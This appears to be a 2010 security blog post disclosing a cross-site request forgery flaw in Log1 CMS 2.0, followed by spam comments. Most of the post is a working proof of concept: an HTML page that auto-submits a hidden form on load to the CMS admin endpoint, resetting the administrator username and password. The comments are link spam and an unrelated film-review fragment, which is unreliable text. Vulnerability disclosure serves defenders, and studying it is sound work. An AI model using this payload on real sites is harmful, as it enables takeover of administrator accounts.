This site is soon to be deprecated by http://www.johnleitch.net

Monday, July 5, 2010

Log1 CMS 2.0 Cross-site Request Forgery

A cross-site request forgery vulnerability in Log1 CMS 2.0 can be exploited to change the admin username and password.

PoC
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/log1cms2.0/admin/main.php?action=step1">
<input type="hidden" name="title" value="log1 CMS" />
<input type="hidden" name="desc" value="log1cms official page" />
<input type="hidden" name="key" value="log1, log 1, CMS, content managment system" />
<input type="hidden" name="language" value="0" />
<input type="hidden" name="bgcolor" value="#ffffff" />
<input type="hidden" name="textcolor" value="#999999" />
<input type="hidden" name="specialcolor" value="#000000" />
<input type="hidden" name="login" value="admin" />
<input type="hidden" name="pass" value="Password1" />
<input type="hidden" name="isMd5" value="1" />
<input type="hidden" name="google_login" value="gerard.caplain" />
<input type="hidden" name="email" value="log_1[ at ]users.sourceforge.net" />
<input type="hidden" name="copyright" value="2010 by log1" />
</form>
</body>
</html>

6 comments:

  1. We really love your blog, i haven't seen you keeping the posts in in some time now. Is everything ok.
    Fort Worth Photographer
    enfamil baby formula

    ReplyDelete
  2. It properly. You really smart. I am very happy for it. Wish a nice day.good night.
    Kia Radiator
    acid stained concrete plano

    ReplyDelete
  3. i haven't seen you keeping the posts in in some time now. Is everything ok.


    __________________
    sales funnelEMS Supplies

    ReplyDelete
  4. gold coast recording studioCheap VPNTarantino's essaying of the Basterds themselves will doubtless bring about divergent reactions. One may interpret the American “Basterds” as ridiculous, over-the-top cartoon characters—although Tarantino does not afford most of them much time or weight, beyond Brad Pitt's Aldo Raine, Eli Roth's “Bear Jew” Donny Donowitz and Til Schweiger's Sergeant Hugo Stiglitz—so the cartoon quality of the characters is perhaps actually softened. Pitt is fine in his role and repeatedly quite

    ReplyDelete